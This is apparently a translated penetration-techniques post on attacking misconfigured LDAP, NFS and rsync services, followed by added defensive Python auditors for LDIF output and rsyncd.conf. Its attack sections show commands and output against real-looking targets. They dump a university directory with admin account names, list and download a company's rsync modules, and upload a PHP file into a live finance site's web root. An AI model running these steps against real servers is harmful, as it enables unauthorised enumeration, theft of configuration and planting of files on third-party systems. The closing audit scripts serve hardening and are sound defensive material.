I. LDAP penetration skills
1. cat /etc/nsswitch.conf
Check the password lookup policy: the passwd line reads "files ldap", so accounts are resolved from local files first and then from LDAP.
2. less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
This gives the search base (the ou and dc components) to use in the queries below.
3. Search for the administrator entry
Anonymous mode (no password supplied):
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
With a password prompt (-W):
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
4. Search for 10 user records (-z limits the result count, -p selects the port)
ldapsearch -h 192.168.2.2 -x -z 10 -p <port>
Penetration Practice:
1. Return all entries and attributes under the base (subtree scope)
ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: manager
cn: manager

dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
uid: superadmin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: superadmin
cn: superadmin

dn: uid=admin,dc=ruc,dc=edu,dc=cn
uid: admin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: admin
cn: admin

dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
uid: dcp_anonymous
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
sn: dcp_anonymous
cn: dcp_anonymous
2. View the base entry only (base scope)
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain
3. Search the root DSE (empty base) to read the server's own attributes
bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
dn:
objectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn
supportedExtension: 2.16.840.1.113730.3.5.7
supportedExtension: 2.16.840.1.113730.3.5.8
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
supportedExtension: 2.16.840.1.113730.3.5.3
supportedExtension: 2.16.840.1.113730.3.5.5
supportedExtension: 2.16.840.1.113730.3.5.6
supportedExtension: 2.16.840.1.113730.3.5.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
supportedExtension: 1.3.6.1.4.1.1466.20037
supportedExtension: 1.3.6.1.4.1.4203.1.11.3
supportedControl: 2.16.840.1.113730.3.4.2
supportedControl: 2.16.840.1.113730.3.4.3
supportedControl: 2.16.840.1.113730.3.4.4
supportedControl: 2.16.840.1.113730.3.4.5
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.16
supportedControl: 2.16.840.1.113730.3.4.15
supportedControl: 2.16.840.1.113730.3.4.17
supportedControl: 2.16.840.1.113730.3.4.19
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 2.16.840.1.113730.3.4.14
supportedControl: 1.3.6.1.4.1.1466.29539.12
supportedControl: 2.16.840.1.113730.3.4.12
supportedControl: 2.16.840.1.113730.3.4.18
supportedControl: 2.16.840.1.113730.3.4.13
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
dataversion: 020090516011411
netscapemdsuffix: cn=ldap://dc=webA:389
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
For the scripts used for penetration, see the attachment.
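The two anonymous queries above (the subtree search that returns every account, and the root DSE read that returns the server's cipher and protocol support) are the kind of output a defender should review rather than eyeball. The following is an added example, not a script from the original post or its attachment: it parses LDIF text as ldapsearch prints it, lists the accounts an anonymous client can read, and flags LDAPv2 support and cipher suites with NULL, EXPORT, single-DES, RC4/RC2 or MD5 components. The LDIF samples are constructed in the shape of the output shown above (the domain dc=example,dc=edu,dc=cn and the vendor string are placeholders).

```python
"""Audit anonymous ldapsearch output (LDIF) for exposed accounts and weak server settings.
Added example: not the original post's script. All sample data below is constructed."""
import re
from collections import defaultdict

# Constructed root DSE in the shape of "ldapsearch -b '' -s base" output.
SAMPLE_ROOTDSE = """\
version: 1
dn:
objectClass: top
namingContexts: dc=example,dc=edu,dc=cn
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Example Directory Vendor
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
"""

# Constructed subtree search result; entries are separated by blank lines as real LDIF is,
# but the parser also copes with output where the blank lines were lost (a new "dn:" starts an entry).
SAMPLE_ANON_SEARCH = """\
version: 1
dn: dc=example,dc=edu,dc=cn
dc: example
objectClass: domain

dn: uid=manager,dc=example,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson
objectClass: person
sn: manager
cn: manager

dn: uid=admin,dc=example,dc=edu,dc=cn
uid: admin
objectClass: inetOrgPerson
objectClass: person
sn: admin
cn: admin
"""

# Substrings that mark a cipher suite as weak: no encryption, export grade, single DES, RC4/RC2, MD5 MAC.
WEAK_CIPHER_MARKERS = ("NULL", "EXPORT", "_DES_", "RC4", "RC2", "MD5")


def parse_ldif(text):
    """Parse LDIF into a list of entries: {attribute (lower-cased): [values]}."""
    entries, current = [], None
    unfolded = re.sub(r"\n ", "", text)  # join continuation lines (leading space)
    for line in unfolded.splitlines():
        if not line.strip():
            if current is not None:
                entries.append(current)
                current = None
            continue
        if line.startswith("#") or line.lower().startswith("version:"):
            continue
        attr, _, value = line.partition(":")
        value = value.lstrip()
        if value.startswith(":"):  # "attr:: base64" marker; value kept as-is here
            value = value[1:].lstrip()
        if attr.lower() == "dn" and current is not None:
            entries.append(current)  # a new dn starts a new entry even without a blank line
            current = None
        if current is None:
            current = defaultdict(list)
        current[attr.lower()].append(value)
    if current is not None:
        entries.append(current)
    return entries


def is_weak_cipher(name):
    """True for suites carrying any of the weak markers above."""
    return any(marker in name.upper() for marker in WEAK_CIPHER_MARKERS)


def audit_rootdse(entries):
    """Summarise the root DSE (the entry with an empty dn) into a findings dict."""
    root = next((e for e in entries if e.get("dn") == [""]), None)
    if root is None:
        raise ValueError("no root DSE entry (empty dn) in input")
    return {
        "ldapv2_enabled": "2" in root.get("supportedldapversion", []),
        "naming_contexts": root.get("namingcontexts", []),
        "sasl_mechanisms": root.get("supportedsaslmechanisms", []),
        "vendor": root.get("vendorname", []),
        "weak_ciphers": sorted(c for c in root.get("supportedsslciphers", []) if is_weak_cipher(c)),
    }


def exposed_accounts(entries):
    """Sorted uids of person entries that the (anonymous) search returned."""
    return sorted(
        uid
        for e in entries
        if any(oc.lower() == "person" for oc in e.get("objectclass", []))
        for uid in e.get("uid", [])
    )


if __name__ == "__main__":
    for key, val in audit_rootdse(parse_ldif(SAMPLE_ROOTDSE)).items():
        print(f"{key}: {val}")
    print("accounts readable anonymously:", exposed_accounts(parse_ldif(SAMPLE_ANON_SEARCH)))
```

To run it against a real server, pipe the ldapsearch output into parse_ldif instead of the constructed samples; the findings that matter for hardening are a non-empty exposed_accounts list (anonymous read of the people tree), ldapv2_enabled, and any entries in weak_ciphers.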
II. NFS penetration skills
showmount -e <ip>
Lists the directories the NFS server exports and the client hosts or networks allowed to mount each one.
Penetration Animation:
III. rsync penetration skills
1. List the modules on the rsync server (a bare host followed by :: requests the module list)
rsync 210.51.X.X::
finance
img_finance
auto
img_auto
html_cms
img_cms
ent_cms
ent_img
ceshi
res_img
res_img_c2
chip
chip_c2
ent_icms
games
gamesimg
media
mediaimg
fashion
res-fashion
res-fo
taobao-home
res-taobao-home
house
res-house
res-home
res-edu
res-ent
res-labs
res-news
res-phtv
res-media
home
edu
news
res-book
View the contents of a module (note that the module name must be followed by a /):
rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/
2. Download the configuration files from the rsync server
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
3. Upload a file to the rsync server (the upload succeeded; existing files were not overwritten)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
http://app.finance.xxx.com/warn/nothack.txt
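Everything in section III works only because the rsync daemon lists its modules to anyone, serves them to any address, and accepts writes without credentials; each of those is a separate rsyncd.conf parameter. The following is an added example, not the post's script or rsync's own tooling: it parses an rsyncd.conf (the ini-like format rsyncd.conf(5) uses, with global parameters before the first [module] stanza), reports which modules are exposed in those ways using the documented defaults ("read only" and "list" default to yes; "auth users" and "hosts allow" default to unset), and renders a hardened stanza. The configuration, module names and paths below are constructed; the user and network in the hardened stanza are placeholders.

```python
"""Audit rsyncd.conf modules for anonymous listing, unrestricted hosts and anonymous writes.
Added example, not part of the original post; the sample configuration is constructed."""

SAMPLE_RSYNCD_CONF = """\
# global parameters (constructed sample)
uid = nobody
gid = nobody
use chroot = yes

[htdocs_app]
    path = /var/www/htdocs_app
    comment = web application root
    read only = no

[finance]
    path = /srv/finance
    list = no
    read only = yes
    auth users = deploy
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/8
"""


def parse_rsyncd_conf(text):
    """Return (globals, modules); keys are lower-cased, values are stripped strings."""
    global_params, modules, section = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":  # comment or blank line
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            modules[section] = {}
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue  # not a parameter line; ignore
        target = global_params if section is None else modules[section]
        target[key.strip().lower()] = value.strip()
    return global_params, modules


def _param(name, module, global_params, default):
    """Module value, else the global value, else the rsyncd.conf(5) default."""
    return module.get(name, global_params.get(name, default))


def _is_true(value):
    return value.strip().lower() in ("yes", "true", "1")


def audit_modules(global_params, modules):
    """Map each module name to a list of exposure findings (empty list = no finding)."""
    report = {}
    for name, params in modules.items():
        issues = []
        if not _param("auth users", params, global_params, ""):
            issues.append("no 'auth users': any client that reaches the port may use the module")
        if not _param("hosts allow", params, global_params, ""):
            issues.append("no 'hosts allow': not restricted to trusted client addresses")
        if _is_true(_param("list", params, global_params, "yes")):
            issues.append("'list' is yes: the module name appears in 'rsync host::' output")
        if not _is_true(_param("read only", params, global_params, "yes")):
            issues.append("'read only' is no: clients may upload files into the module")
        report[name] = issues
    return report


def hardened_stanza(name, params):
    """Render the module with exposure parameters pinned to safe values.
    <deploy-user> and <trusted-network> are placeholders to fill in; drop 'read only = yes'
    only for a module that genuinely needs uploads, and then keep 'auth users' on it."""
    return "\n".join([
        f"[{name}]",
        f"    path = {params.get('path', '/path/to/module')}",
        "    list = no",
        "    read only = yes",
        "    auth users = <deploy-user>",
        "    secrets file = /etc/rsyncd.secrets",
        "    hosts allow = <trusted-network>",
    ])


if __name__ == "__main__":
    globals_, mods = parse_rsyncd_conf(SAMPLE_RSYNCD_CONF)
    for module, issues in audit_modules(globals_, mods).items():
        print(module, "->", issues or "ok")
    print(hardened_stanza("htdocs_app", mods["htdocs_app"]))
```

The [htdocs_app] stanza reproduces the exposure in section III (listable, reachable from anywhere, writable), while [finance] shows the same module with all four parameters set; reading the real /etc/rsyncd.conf into parse_rsyncd_conf gives the same report for a live server.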